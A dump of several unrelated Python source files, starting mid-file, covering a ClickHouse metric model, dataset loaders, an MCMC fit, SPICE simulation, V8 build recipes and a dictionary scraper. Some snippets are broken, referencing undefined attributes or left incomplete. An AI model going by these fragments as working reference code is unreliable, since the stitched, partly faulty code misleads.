StringField() def __str__(self): return self.name def to_json(self): v = {"name": self.name, "is_required": bool(self.is_required)} if self.default_value: v["default_value"] = self.default_value return v @on_delete_check(check=[("pm.MetricType", "scope")]) @six.python_2_unicode_compatible class MetricScope(Document): meta = { "collection": "noc.metricscopes", "strict": False, "auto_create_index": False, "json_collection": "pm.metricscopes", "json_unique_fields": ["name"], } name = StringField(unique=True) uuid = UUIDField(binary=True) # Database table name table_name = StringField() description = StringField(required=False) key_fields = ListField(EmbeddedDocumentField(KeyField)) path = ListField(EmbeddedDocumentField(PathItem)) enable_timedelta = BooleanField(default=False) _id_cache = cachetools.TTLCache(maxsize=100, ttl=60) def __str__(self): return self.name @classmethod @cachetools.cachedmethod(operator.attrgetter("_id_cache"), lock=lambda _: id_lock) def get_by_id(cls, id): return MetricScope.objects.filter(id=id).first() @property def json_data(self): r = { "name": self.name, "$collection": self._meta["json_collection"], "uuid": self.uuid, "table_name": self.table_name, "description": self.description, "key_fields": [kf.to_json() for kf in self.key_fields], "path": [p.to_json() for p in self.path], "enable_timedelta": self.enable_timedelta, } return r def to_json(self): return to_json( self.json_data, order=[ "name", "$collection", "uuid", "table_name", "description", "key_fields", "path", ], ) def get_json_path(self): return "%s.json" % self.name def iter_fields(self): """ Yield (field_name, field_type) tuples :return: """ from .metrictype import MetricType yield "date", "Date" yield "ts", "DateTime" for f in self.key_fields: yield f.field_name, f.field_type if self.path: yield "path", "Array(String)" if self.enable_timedelta: yield "time_delta", "UInt16" for t in MetricType.objects.filter(scope=self.id).order_by("id"): yield (t.field_name, t.field_type) def get_create_sql(self): """ Get CREATE TABLE SQL statement :return: """ pk = [f.field_name for f in self.key_fields] if self.path: pk += ["path"] pk += ["ts"] r = [ "CREATE TABLE IF NOT EXISTS %s (" % self._get_raw_db_table(), ",\n".join(" %s %s" % (n, t) for n, t in self.iter_fields()), ") ENGINE = MergeTree(date, (%s), 8192)" % ", ".join(pk), ] return "\n".join(r) def get_create_distributed_sql(self): """ Get CREATE TABLE for Distributed engine :return: """ return ( "CREATE TABLE IF NOT EXISTS %s " "AS %s " "ENGINE = Distributed(%s, %s, %s)" % ( self.table_name, self._get_raw_db_table(), config.clickhouse.cluster, config.clickhouse.db, self._get_raw_db_table(), ) ) def _get_raw_db_table(self): if config.clickhouse.cluster: return "raw_%s" % self.table_name else: return self.table_name def ensure_table(self, connect=None): """ Ensure table is exists :return: True, if table has been changed """ from noc.core.clickhouse.connect import connection def ensure_columns(table_name): c = False # Alter when necessary existing = {} for name, type in ch.execute( """ SELECT name, type FROM system.columns WHERE database=%s AND table=%s """, [config.clickhouse.db, table_name], ): existing[name] = type after = None for f, t in self.iter_fields(): if f not in existing: ch.execute( post="ALTER TABLE %s ADD COLUMN %s %s AFTER %s" % (table_name, f, t, after) ) c = True after = f if f in existing and existing[f] != t: print("Warning! Type mismatch for column %s: %s <> %s" % (f, existing[f], t)) print( "Set command manually: ALTER TABLE %s MODIFY COLUMN %s %s" % (table_name, f, t) ) return c changed = False ch = connect or connection(read_only=False) if not ch.has_table(self._get_raw_db_table()): # Create new table ch.execute(post=self.get_create_sql()) changed = True else: changed |= ensure_columns(self._get_raw_db_table()) # Check for distributed table if config.clickhouse.cluster: if not ch.has_table(self.table_name): ch.execute(post=self.get_create_distributed_sql()) changed = True else: changed |= ensure_columns(self.table_name) return changed
nilq/baby-python
python
import os import pickle import random import torch import numpy as np import math from torch.utils.data import Dataset class RicoDataset(Dataset): ''' dataset Loader for rico ''' def __init__(self, data_path, debug=False ) -> None: super().__init__() self.data_path = data_path self.debug = debug self.data = [] max_len = -1 ''' load data from file''' with open(self.data_path, 'rb+') as f: # data_temp = pickle.load(f) # max_len = -1 # for layout in data_temp: # batch_data = [] # max_len = max(max_len, len(layout['label']) * 5) # for i in range(len(layout['label'])): # batch_data.append((layout['label'][i])) # batch_data.append((math.ceil(layout['box'][i][0] * 127))) # x1 # batch_data.append((math.ceil(layout['box'][i][1] * 127))) # y1 # batch_data.append((math.ceil((layout['box'][i][2]- layout['box'][i][0]) * 127))) # w # batch_data.append((math.ceil((layout['box'][i][3]- layout['box'][i][1]) * 127))) # h # self.data.append(batch_data) # # padding layout # for i in range(len(self.data)): # if len(self.data[i]) < max_len: # for j in range(max_len - len(self.data[i])): # self.data[i].append(-1) # self.data = np.array(self.data) data_temp = pickle.load(f) for layout in data_temp: batch_data = '' for i in range(len(layout['label'])): batch_data = batch_data + ' ' + str((layout['label'][i])) + ' ' + \ str(math.ceil(layout['box'][i][0] * 127)) + ' ' + str(math.ceil(layout['box'][i][1] * 127)) + ' ' + \ str(math.ceil(layout['box'][i][2] * 127) - math.ceil(layout['box'][i][0] * 127)) + ' ' + \ str(math.ceil(layout['box'][i][3] * 127) - math.ceil(layout['box'][i][1] * 127)) self.data.append(batch_data.lstrip().rstrip()) if debug: self.data = self.data[:100] def __getitem__(self, index): return self.data[index] def __len__(self): return len(self.data) if __name__ == '__main__': data_loader = RicoDataset(data_path='./dataset/RICO.pkl') print(data_loader.__getitem__(0)) print(data_loader.__getitem__(1))
nilq/baby-python
python
import numpy as np import scipy.stats as stats import matplotlib.pyplot as plt import scipy.optimize as opt import emcee import triangle, walkers import priors np.random.seed(666) def randomData(a, b, sig, npts = 100): x = np.random.random(npts) mean = a + b * x y = stats.norm(loc=mean, scale=sig).rvs(size=mean.shape) return x, y if __name__ == "__main__": aTrue = 7.1 bTrue = 10.0 sigTrue = np.sqrt(2.0) aGuess = 6.9 bGuess = 10.5 sigGuess = np.sqrt(1.8) x, y = randomData(aTrue, bTrue, sigTrue) yerrTrue = sigTrue*np.ones_like(x) sigPrior = priors.HalfCauchyPrior(0, 0.1) # Step 5: MCMC modeling, unknown errors, prior on sigma def chi2(params, *args): a, b, sigma = params xf, yf = args prediction = a + b * xf chi2 = np.sum( (prediction - yf)**2 / sigma**2 ) chi2 += np.log(2 * np.pi * sigma**2) return chi2 def lnprior(params): a, b, sigma = params #if sigma < 1e-10 or sigma > 10: # return -np.inf #return 0.0 return sigPrior.lnlike(sigma) def lnlike(params, *args): lp = lnprior(params) if not np.isfinite(lp): return -np.inf return -0.5 * chi2(params, *args) + lp result = opt.minimize(chi2, [aGuess, bGuess, sigGuess], args=(x, y), method="BFGS") print "Nonlinear fit, no errors" print " a' = %.3f +/- %.3f" % (result.x[0], np.sqrt(result.hess_inv[0][0])) print " b' = %.3f +/- %.3f" % (result.x[1], np.sqrt(result.hess_inv[1][1])) print " sig' = %.3f +/- %.3f" % (result.x[2], np.sqrt(result.hess_inv[2][2])) ndim, nwalkers, nburn, nstep = 3, 100, 1000, 10000 pos = [np.array((aGuess, bGuess, sigGuess)) + 1e-4*np.random.randn(ndim) for i in range(nwalkers)] sampler = emcee.EnsembleSampler(nwalkers, ndim, lnlike, args=(x, y)) pos, prob, state = sampler.run_mcmc(pos, nburn) sampler.reset() pos, prob, state = sampler.run_mcmc(pos, nstep, rstate0=state) fig = plt.figure() sp = fig.add_subplot(111) sp.errorbar(x, y, yerr=yerrTrue, fmt="ro") sp.plot(x, aTrue + bTrue * x, "r-") flatchain = sampler.flatchain print "MCMC analysis" flata = flatchain[:,0] flatb = flatchain[:,1] flatsig = flatchain[:,2] print " a = %.3f +%.3f -%.3f" % (np.percentile(flata, 50), np.percentile(flata, 50)-np.percentile(flata, 50-68.27/2), np.percentile(flata, 50+68.27/2)-np.percentile(flata, 50), ) print " b = %.3f +%.3f -%.3f" % (np.percentile(flatb, 50), np.percentile(flatb, 50)-np.percentile(flatb, 50-68.27/2), np.percentile(flatb, 50+68.27/2)-np.percentile(flatb, 50), ) print " sig = %.3f +%.3f -%.3f" % (np.percentile(flatsig, 50), np.percentile(flatsig, 50)-np.percentile(flatsig, 50-68.27/2), np.percentile(flatsig, 50+68.27/2)-np.percentile(flatsig, 50), ) for a, b in flatchain[np.random.randint(len(flatchain), size=100)][:,:2]: sp.plot(x, a + b*x, color="k", alpha=0.05) triangle.triangle(flatchain, ("a", "b", "sig")) walkers.walkers(sampler.chain, ("a", "b", "sig")) plt.show()
nilq/baby-python
python
import os from Zoo.World import World from Zoo.Position import Position from Zoo.Organisms.Grass import Grass from Zoo.Organisms.Sheep import Sheep from Zoo.Organisms.Dandelion import Dandelion from Zoo.Organisms.Wolf import Wolf from Zoo.Organisms.Toadstool import Toadstool if __name__ == '__main__': pyWorld = World(8, 8) newOrg = Grass(position=Position(xPosition=4, yPosition=0), world=pyWorld) pyWorld.addOrganism(newOrg) newOrg = Sheep(position=Position(xPosition=0, yPosition=0), world=pyWorld) pyWorld.addOrganism(newOrg) newOrg = Dandelion(position=Position(xPosition=0, yPosition=4), world=pyWorld) pyWorld.addOrganism(newOrg) newOrg = Wolf(position=Position(xPosition=7, yPosition=7), world=pyWorld) pyWorld.addOrganism(newOrg) newOrg = Toadstool(position=Position(xPosition=4, yPosition=4), world=pyWorld) pyWorld.addOrganism(newOrg) print(pyWorld) for _ in range(0, 10): input('') os.system('cls') pyWorld.makeTurn() print(pyWorld)
nilq/baby-python
python
# -*- coding: utf-8 -*- #!/usr/bin/env python3 import os import re import time import random import fileinput import math import pandas as pd import numpy as np import matplotlib.pyplot as plt from spyci import spyci def write_spice(sch_path, file_name, corner): extension = '.spice' lines = ["\n* Parameters\n", ".param iref = 100u\n", ".param vdd = 1.8\n", ".param vss = 0.0\n", ".param vcm = 0.8\n", ".param vac = 10m\n", "\n.options TEMP = 65.0\n", "\n* Models\n", ".lib ~/skywater/skywater-pdk/libraries/sky130_fd_pr_ngspice/latest/models/corners/sky130.lib " + corner + "\n", "\n* Data to save\n", ".save all \n", "\n* Simulation \n", ".control\n", " ac dec 100 1 10G\n" " meas ac GBW when vdb(vout)=0\n" " meas ac DCG find vdb(vout) at=1\n" " meas ac PM find vp(vout) when vdb(vout)=0\n" " print PM*180/PI\n" " set filetype = ascii\n", " write ac_openloop_" + corner + ".raw\n", ".endc\n"] spice_file = open(sch_path + file_name + extension, 'r') contents = spice_file.readlines() spice_file.close() for line in lines: contents.insert(len(contents)-3, str(line)) sim_file = sch_path + file_name + '_sim_' + corner + extension spice_file = open(sim_file, 'w') contents = "".join(contents) spice_file.write(contents) spice_file.close() return sim_file #------------------------------------------------------------------------------ os.system('clear') plt.close('all') #------------------------------------------------------------------------------ spice_command = [] sch_path = 'sch/opamp/' simulator = 'ngspice' options = '-b' inputfile = 'opamp_openloop' rawfile_TT = "ac_openloop_TT.raw" rawfile_FF = "ac_openloop_FF.raw" rawfile_SS = "ac_openloop_SS.raw" corners = ['TT', 'FF', 'SS'] simulation_enable = False if simulation_enable: for corner in corners: sim_file = write_spice(sch_path, inputfile, corner) spice_command = simulator + ' ' + options + ' ' + sim_file os.system(spice_command) ACdataTT = spyci.load_raw(rawfile_TT) ACdataFF = spyci.load_raw(rawfile_FF) ACdataSS = spyci.load_raw(rawfile_SS) data = pd.DataFrame( { "Frequency": [np.real(i) for i in ACdataTT["values"]["frequency"]], "Vout TT": [i for i in ACdataTT["values"]["v(vout)"]], "Vout FF": [i for i in ACdataFF["values"]["v(vout)"]], "Vout SS": [i for i in ACdataSS["values"]["v(vout)"]], "DC Gain TT [dB]": [np.real(i) for i in ACdataTT["values"]["dcg"]], "DC Gain FF [dB]": [np.real(i) for i in ACdataFF["values"]["dcg"]], "DC Gain SS [dB]": [np.real(i) for i in ACdataSS["values"]["dcg"]], "GBW TT [MHz]": [np.real(i)*1e-6 for i in ACdataTT["values"]["gbw"]], "GBW FF [MHz]": [np.real(i)*1e-6 for i in ACdataFF["values"]["gbw"]], "GBW SS [MHz]": [np.real(i)*1e-6 for i in ACdataSS["values"]["gbw"]], "PM TT [degree]": [np.real(i)*180/np.pi for i in ACdataTT["values"]["pm"]], "PM FF [degree]": [np.real(i)*180/np.pi for i in ACdataFF["values"]["pm"]], "PM SS [degree]": [np.real(i)*180/np.pi for i in ACdataSS["values"]["pm"]], } ) data['Mag(Vout) TT [dB]'] = 20*np.log10(np.abs(data['Vout TT'])) data['Mag(Vout) FF [dB]'] = 20*np.log10(np.abs(data['Vout FF'])) data['Mag(Vout) SS [dB]'] = 20*np.log10(np.abs(data['Vout SS'])) data['Ph(Vout) TT [degree]'] = np.arctan2(np.imag(data['Vout TT']),np.real(data['Vout TT']))*180/np.pi data['Ph(Vout) FF [degree]'] = np.arctan2(np.imag(data['Vout FF']),np.real(data['Vout FF']))*180/np.pi data['Ph(Vout) SS [degree]'] = np.arctan2(np.imag(data['Vout SS']),np.real(data['Vout SS']))*180/np.pi fig, ax = plt.subplots(2,1) data.plot(ax=ax[0], x='Frequency', y='Mag(Vout) TT [dB]', logx=True, linewidth='3') data.plot(ax=ax[0], x='Frequency', y='Mag(Vout) FF [dB]', logx=True, linewidth='3') data.plot(ax=ax[0], x='Frequency', y='Mag(Vout) SS [dB]', logx=True, linewidth='3') ax[0].grid() ax[0].set_ylabel('Mag [dB]') ax[0].margins(0,0.05) data.plot(ax=ax[1], x='Frequency', y='Ph(Vout) TT [degree]', logx=True, linewidth='3') data.plot(ax=ax[1], x='Frequency', y='Ph(Vout) FF [degree]', logx=True, linewidth='3') data.plot(ax=ax[1], x='Frequency', y='Ph(Vout) SS [degree]', logx=True, linewidth='3') ax[1].grid() ax[1].set_ylabel('Phase [degree]') ax[1].margins(0,0.05) plt.show()
nilq/baby-python
python
# Copyright 2013 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. from recipe_engine.post_process import Filter DEPS = [ 'archive', 'chromium', 'depot_tools/gclient', 'recipe_engine/context', 'recipe_engine/json', 'recipe_engine/path', 'recipe_engine/platform', 'recipe_engine/properties', 'recipe_engine/raw_io', 'recipe_engine/step', 'recipe_engine/url', 'swarming_client', 'recipe_engine/time', 'depot_tools/tryserver', 'v8', ] def RunSteps(api): v8 = api.v8 v8.apply_bot_config(v8.BUILDERS) additional_trigger_properties = {} tests = v8.create_tests() if v8.is_pure_swarming_tester(tests): api.swarming_client.checkout() # Simulate a v8 update on slim swarming testers. The revision # property is mandatory. The commit position is required by gatekeeper. api.step.active_result.presentation.properties['got_revision'] = ( api.properties['revision']) api.step.active_result.presentation.properties['got_revision_cp'] = ( api.properties.get('parent_got_revision_cp')) v8.set_up_swarming() else: # Make sure we don't run a non-pure swarming tester on a subdir slave. # Subdir slaves have the name pattern 'slaveN-c3#M'. assert '#' not in api.properties.get('bot_id', ''), ( 'Can only use pure swarming testers on subdir slaves.') if api.platform.is_win: api.chromium.taskkill() if v8.generate_sanitizer_coverage: # When collecting code coverage, we need to sync to the revision that # fits to the patch for the line numbers to match. if api.properties['patch_storage'] == 'gerrit': revision = v8.calculate_patch_base_gerrit() else: v8.checkout(patch=False) revision = v8.calculate_patch_base_rietveld() update_step = v8.checkout(revision=revision, suffix='with patch base') else: update_step = v8.checkout() update_properties = update_step.json.output['properties'] if update_properties.get('got_swarming_client_revision'): additional_trigger_properties['parent_got_swarming_client_revision'] = ( update_properties['got_swarming_client_revision']) v8.set_up_swarming() if v8.c.mips_cross_compile: v8.setup_mips_toolchain() v8.runhooks() if v8.generate_gcov_coverage: v8.init_gcov_coverage() if v8.should_build: v8.compile() if v8.run_dynamorio: v8.dr_compile() if v8.should_upload_build: v8.upload_build() v8.maybe_create_clusterfuzz_archive(update_step) if v8.should_download_build: v8.download_build() if v8.should_test: test_results = v8.runtests(tests) v8.maybe_bisect(test_results) if not api.tryserver.is_tryserver and test_results.is_negative: # Let the overall build fail for failures and flakes. raise api.step.StepFailure('Failures or flakes in build.') if api.tryserver.is_tryserver and test_results.has_failures: # Let tryjobs fail for failures only. raise api.step.StepFailure('Failures in tryjob.') if v8.generate_gcov_coverage: v8.upload_gcov_coverage_report() v8.maybe_trigger(**additional_trigger_properties) def GenTests(api): for mastername, _, buildername, _ in api.v8.iter_builders(): yield api.v8.test(mastername, buildername) yield ( api.v8.test( 'client.v8.branches', 'V8 Linux - beta branch', 'branch_sync_failure', ) + api.step_data('bot_update', retcode=1) ) yield ( api.v8.test( 'client.v8', 'V8 Linux', 'swarming_collect_failure', ) + api.step_data('Check', retcode=1) ) # Simulate a tryjob triggered by the CQ for setting up different swarming # default tags. yield ( api.v8.test( 'tryserver.v8', 'v8_linux_rel_ng_triggered', 'triggered_by_cq', requester='commit-bot@chromium.org', patch_project='v8', blamelist=['dude@chromium.org'], ) ) # Simulate a tryjob triggered by the tryserver for setting up different # swarming default tags. yield ( api.v8.test( 'tryserver.v8', 'v8_linux_rel_ng_triggered', 'triggered_by_ts', requester='dude@chromium.org', patch_project='v8', blamelist=['dude@chromium.org'], ) ) # Test usage of test filters. They're used when the buildbucket # job gets a property 'testfilter', which is expected to be a json list of # test-filter strings. yield ( api.v8.test( 'tryserver.v8', 'v8_linux_rel_ng_triggered', 'test_filter', ) + api.properties( testfilter=['mjsunit/regression/*', 'test262/foo', 'test262/bar'], extra_flags='--trace_gc --turbo_stats', ) ) # Test extra properties on a builder bot to ensure it triggers the tester # with the right properties. yield ( api.v8.test( 'tryserver.v8', 'v8_win64_rel_ng', 'test_filter_builder', ) + api.properties( testfilter=['mjsunit/regression/*', 'test262/foo', 'test262/bar'], extra_flags='--trace_gc --turbo_stats', ) + api.post_process(Filter('trigger')) ) # Test using extra flags with a bot that already uses some extra flags as # positional argument. yield ( api.v8.test( 'tryserver.v8', 'v8_linux_arm_armv8a_rel', 'positional_extra_flags', ) + api.properties( extra_flags=['--trace_gc', '--turbo_stats'], ) ) yield ( api.v8.test( 'tryserver.v8', 'v8_linux_rel_ng_triggered', 'failures', ) + api.override_step_data( 'Check', api.v8.output_json(has_failures=True)) ) yield ( api.v8.test( 'tryserver.v8', 'v8_linux_rel_ng_triggered', 'flakes', ) + api.override_step_data( 'Check', api.v8.output_json(has_failures=True, flakes=True)) ) def TestFailures(wrong_results, flakes): results_suffix = "_wrong_results" if wrong_results else "" flakes_suffix = "_flakes" if flakes else "" return ( api.v8.test( 'client.v8', 'V8 Linux64 - internal snapshot', 'test_failures%s%s' % (results_suffix, flakes_suffix), ) + api.override_step_data( 'Check', api.v8.output_json( has_failures=True, wrong_results=wrong_results, flakes=flakes)) ) yield TestFailures(wrong_results=False, flakes=False) yield TestFailures(wrong_results=False, flakes=True) yield ( TestFailures(wrong_results=True, flakes=False) + api.expect_exception('AssertionError') ) yield ( api.v8.test( 'client.v8', 'V8 Linux64 - internal snapshot', 'empty_json', ) + api.override_step_data('Check', api.json.output([])) + api.expect_exception('AssertionError') ) yield ( api.v8.test( 'client.v8', 'V8 Linux64 - internal snapshot', 'one_failure', ) + api.override_step_data('Check', api.v8.one_failure()) ) yield ( api.v8.test( 'client.v8', 'V8 Linux64', 'one_failure_build_env_not_supported', ) + api.override_step_data('Check', api.v8.one_failure()) + api.properties(parent_build_environment=None) ) yield ( api.v8.test( 'client.v8', 'V8 Fuzzer', 'fuzz_archive', ) + api.step_data('Fuzz', retcode=1) ) # Bisect over range a1, a2, a3. Assume a2 is the culprit. Steps: # Bisect a0 -> no failures. # Bisect a2 -> failures. # Bisect a1 -> no failures. # Report culprit a2. yield ( api.v8.test( 'client.v8', 'V8 Linux - predictable', 'bisect', ) + api.v8.fail('Mjsunit') + api.v8.fail('Bisect a2.Retry') + api.time.step(120) ) # The same as above, but overriding changes. yield ( api.v8.test( 'client.v8', 'V8 Linux - predictable', 'bisect_override_changes', ) + api.properties( override_changes=[ {'revision': 'a1'}, {'revision': 'a2'}, {'revision': 'a3'}, ], ) + api.v8.fail('Mjsunit') + api.v8.fail('Bisect a2.Retry') + api.time.step(120) ) # Disable bisection, because the failing test is too long compared to the # overall test time. yield ( api.v8.test( 'client.v8', 'V8 Linux - predictable', 'bisect_tests_too_long', ) + api.v8.fail('Mjsunit') + api.time.step(7) ) # Bisect over range a1, a2, a3. Assume a2 is the culprit. # Same as above with a swarming builder_tester. yield ( api.v8.test( 'client.v8', 'V8 Linux - shared', 'bisect_swarming', ) + api.v8.fail('Check') + api.v8.fail('Bisect a2.Retry') + api.time.step(120) ) # Bisect over range a1, a2, a3. Assume a3 is the culprit. This is a tester # and the build for a2 is not available. Steps: # Bisect a0 -> no failures. # Bisect a1 -> no failures. # Report a2 and a3 as possible culprits. yield ( api.v8.test( 'client.v8', 'V8 Linux64', 'bisect_tester_swarming', ) + api.v8.fail('Check') + api.time.step(120) ) # Same as above with a slim swarming tester. yield ( api.v8.test( 'client.v8', 'V8 Linux64 - custom snapshot - debug', 'slim_bisect_tester_swarming', ) + api.v8.fail('Mjsunit') + api.override_step_data( 'Bisect a0.gsutil download isolated json', api.json.output({'mjsunit': '[dummy hash for bisection]'}), ) + api.override_step_data( 'Bisect a1.gsutil download isolated json', api.json.output({'mjsunit': '[dummy hash for bisection]'}), ) + api.time.step(120) ) # Same as above with a windows bot. Regression test making sure that # the swarming hashes are searched in a windows bucket. f = Filter() f = f.include_re(r'.*check build.*') yield ( api.v8.test( 'client.v8', 'V8 Win32', 'bisect', ) + api.v8.fail('Check') + api.post_process(f) + api.time.step(120) ) # Disable bisection due to a recurring failure. Steps: # Bisect a0 -> failures. yield ( api.v8.test( 'client.v8', 'V8 Linux - predictable', 'bisect_recurring_failure', ) + api.v8.fail('Mjsunit') + api.v8.fail('Bisect a0.Retry') + api.time.step(120) ) # Disable bisection due to less than two changes. yield ( api.v8.test( 'client.v8', 'V8 Linux - predictable', 'bisect_one_change', ) + api.v8.fail('Mjsunit') + api.url.json( 'Bisect.Fetch changes', api.v8.example_one_buildbot_change()) + api.override_step_data( 'Bisect.Get change range', api.v8.example_bisection_range_one_change(), ) + api.time.step(120) ) # Explicitly highlight slow tests not marked as slow. yield ( api.v8.test( 'tryserver.v8', 'v8_linux_rel_ng_triggered', 'slow_tests', requester='commit-bot@chromium.org', patch_project='v8', blamelist=['dude@chromium.org'], ) + api.override_step_data( 'Check', api.v8.output_json(unmarked_slow_test=True)) ) # Test gerrit tryjobs. yield ( api.v8.test( 'tryserver.v8', 'v8_linux_rel_ng', 'gerrit', requester='commit-bot@chromium.org', gerrit_project='v8/v8', blamelist=['dude@chromium.org'], ) ) # Test gerrit tryjobs on coverage bot. yield ( api.v8.test( 'tryserver.v8', 'v8_linux64_sanitizer_coverage_rel', 'gerrit', requester='commit-bot@chromium.org', gerrit_project='v8/v8', blamelist=['dude@chromium.org'], ) ) yield ( api.v8.test( 'client.v8', 'V8 Linux64 - builder', 'with_gn', ) + api.override_step_data( 'generate_build_files', api.raw_io.stream_output( 'Writing """\\\n' 'goma_dir = "/b/build/slave/cache/cipd/goma"\n' 'target_cpu = "x64"\n' 'use_goma = true\n' '""" to /path/to/args.gn.\n' 'moar\n')) )
nilq/baby-python
python
#!/usr/bin/python -Wall # ================================================================ # Please see LICENSE.txt in the same directory as this file. # John Kerl # kerl.john.r@gmail.com # 2007-05-31 # ================================================================ ispec_mul_table = [99] ispec_inv_table = []
nilq/baby-python
python
# sys.path.append(os.getcwd() + '/..') # Uncomment for standalone running from abstract_filter import * import re class RepeatedChars(AbstractFilter): def __init__(self): self.num_of_scans = 0 self.src_language = "" self.trg_language = "" self.repeated_chars_re = None # def initialize(self, source_language, target_language, extra_args): self.num_of_scans = 0 self.src_language = extra_args['source language'] self.trg_language = extra_args['target language'] self.repeated_chars_re = re.compile(r"(\w)\1{2,}") if extra_args['emit scores'] == True: self.num_of_scans = 1 return def finalize(self): pass def process_tu(self, tu, num_of_finished_scans): minus_points = 0 src_repeated_chars = len(self.repeated_chars_re.findall(tu.src_phrase)) trg_repeated_chars = len(self.repeated_chars_re.findall(tu.trg_phrase)) if src_repeated_chars != trg_repeated_chars: return [0] return [1] def do_after_a_full_scan(self, num_of_finished_scans): pass def decide(self, tu): minus_points = 0 # - Repeated chars length ------------------------------------------------ # src_repeated_chars = self.repeated_chars_re.finditer(tu.src_phrase) # trg_repeated_chars = self.repeated_chars_re.finditer(tu.trg_phrase) # src_max_length_of_repeat = max(0, [len(x.group(0)) for x in src_repeated_chars]) # trg_max_length_of_repeat = max(0, [len(x.group(0)) for x in trg_repeated_chars]) # if (src_max_length_of_repeat > 3 and trg_max_length_of_repeat <= 3) or (src_max_length_of_repeat < 3 and trg_max_length_of_repeat > 3): # minus_points += 1 # - Repeated chars occurrence -------------------------------------------- src_repeated_chars = len(self.repeated_chars_re.findall(tu.src_phrase)) trg_repeated_chars = len(self.repeated_chars_re.findall(tu.trg_phrase)) if src_repeated_chars != trg_repeated_chars: minus_points += 1 if minus_points > 0: return 'reject' return 'accept'
nilq/baby-python
python
import itertools import random import logging import numpy as np import matplotlib.pyplot as plt import os #from evaluate_reservoir import * from utilis import * from args import args as my_args from evaluate_encoder import * from itertools import product import time if __name__ == '__main__': args = my_args() print(args.__dict__) # Fix the seed of all random number generator seed = 50 random.seed(seed) np.random.seed(seed) df = pd.DataFrame({ "dataset":[],"encode_thr_up":[],"encode_thr_dn":[],"tstep":[],"encode_refractory":[],"encode_interpfact":[],"firing_rate":[],"svm_score":[],"rf_score":[],"svm_score_baseline":[],"svm_score_comb":[],"rf_score_comb":[]}) parameters = dict( dataset = [ 'bci3'] ,encode_thr_up = [1.1] ,encode_thr_dn = [1.1] ,tstep=[500,3000] ,interpfact = [1] ,refractory = [1] #,tstep=[100, 200, 300, 400, 500, 600, 700, 800, 900, 1000, 1100, 1200, 1300, 1400, 1500] # , fold=[1,2,3] ) param_values = [v for v in parameters.values()] for args.dataset,args.encode_thr_up,args.encode_thr_dn, args.tstep, args.encode_interpfact,args.encode_refractory in product(*param_values): #args.tstep = tstep args.experiment_name = str(args.dataset)+str(args.encode_thr_up)+str(args.encode_thr_dn)+str(args.encode_interpfact)+str(args.encode_refractory) svm_score, rf_score, firing_rate, svm_score_baseline, svm_score_comb, rf_score_comb = evaluate_encoder(args) df = df.append({ "dataset":args.dataset, "fold":args.fold, "encode_thr_up":args.encode_thr_up, "encode_thr_dn":args.encode_thr_dn, "tstep": args.tstep, "encode_refractory": args.encode_refractory, "encode_interpfact": args.encode_interpfact, "firing_rate":firing_rate, "svm_score":svm_score, "rf_score":rf_score, "svm_score_baseline":svm_score_baseline, "svm_score_comb":svm_score_comb, "rf_score_comb":rf_score_comb },ignore_index=True) timestr = time.strftime("%Y%m%d-%H%M%S") log_file_name = 'accuracy_log'+str(timestr)+'.csv' pwd = os.getcwd() log_dir = pwd+'/log_dir/' df.to_csv(log_dir+log_file_name, index=False) df.to_csv(log_file_name, index=False) # logger.info('All done.')
nilq/baby-python
python
#! /usr/bin/python import ctypes import os __author__ = 'fyabc' # Try to locate the shared library _file = 'my_utils.dll' _path = os.path.join(*(os.path.split(__file__)[:-1] + (_file,))) _module = ctypes.cdll.LoadLibrary(_path) # void myPrint(int) myPrint = _module.myPrint myPrint.argtypes = (ctypes.c_int,) myPrint.restype = None # int gcd(int, int) gcd = _module.gcd gcd.argtypes = (ctypes.c_int, ctypes.c_int) gcd.restype = ctypes.c_int # int inMandel(double, double, int) inMandel = _module.inMandel inMandel.argtypes = (ctypes.c_double, ctypes.c_double, ctypes.c_int) inMandel.restype = ctypes.c_int # int divMod(int, int, int*) _divMod = _module.divMod _divMod.argtypes = (ctypes.c_int, ctypes.c_int, ctypes.POINTER(ctypes.c_int)) _divMod.restype = ctypes.c_int def divMod(x, y): r = ctypes.c_int() q = _divMod(x, y, r) return q, r # void avg(double*, int) # Define a special type for 'double *' argument class DoubleArrayType: def fromParam(self, param): typename = type(param).__name__ if hasattr(self, 'from_' + typename): return getattr(self, 'from_' + typename)(param) elif isinstance(param, ctypes.Array): return param else: raise TypeError('Cannot convert %s to a double array' % typename) # Cast from array.array objects def test(): print(myPrint(4)) if __name__ == '__main__': test()
nilq/baby-python
python
import urllib.request import re import sys class WordReader: MEANING_URL = "https://dict.longdo.com/search/%s" @staticmethod def __get_url_content(url): fp = urllib.request.urlopen(url) content = fp.read().decode("utf8") fp.close() return content @staticmethod def get_phonetics(word): link = WordReader.CAMBRIDGE_URL % (word) html = WordReader.__get_url_content(link) pivot = 'class="phoneticspelling">' start = html.find(pivot) if start == -1: return "" end = html.find("</span>", start) phonetics = html[start + len(pivot) + 1: end - 1] phonetics = phonetics.replace('ˈ', '').replace('ˌ', '') if len(phonetics) == 0: return "@INVALID" start = 0 while start < len(phonetics): char = phonetics[start:start + 2] if char in WordReader.VALID_IPA: start = start + 2 else: char = phonetics[start:start + 1] if char in WordReader.VALID_IPA: start = start + 1 else: print(phonetics, "phonetics error at", start) return "@INVALID " + phonetics return phonetics @staticmethod def get_meanings(word): link = WordReader.MEANING_URL % (word) html = WordReader.__get_url_content(link) start = html.find('NECTEC') if (start == -1): return "" end = html.find('</table>', start) scope = html[start: end] start = 0 pivot = 'HREF="search/%s"' % (word) meanings = [] while True: start = scope.find(pivot, start) if start == -1: break start = scope.find('[', start) end = scope.find('</tr>', start) meaning = scope[start: end] meaning = re.sub(r'<[^>]*>', '', meaning) meaning = meaning.replace(' See also:', '') meaning = meaning.replace('[N]', '[n]').replace('[VI]', '[vi]').replace('[VT]', '[vt]').replace('[ADJ]', '[adj]').replace('[ADV]', '[adv]') sp = meaning.split(', Syn.') meanings.append(sp[0].replace(', ', ',')) if len(sp) > 1: meanings.append(' syn.' + sp[1].replace(',', ';')) return meanings[:-1] if len(sys.argv) > 1: words = sys.argv[1:] for word in words: print(word, "=", WordReader.get_meanings(word))
nilq/baby-python
python
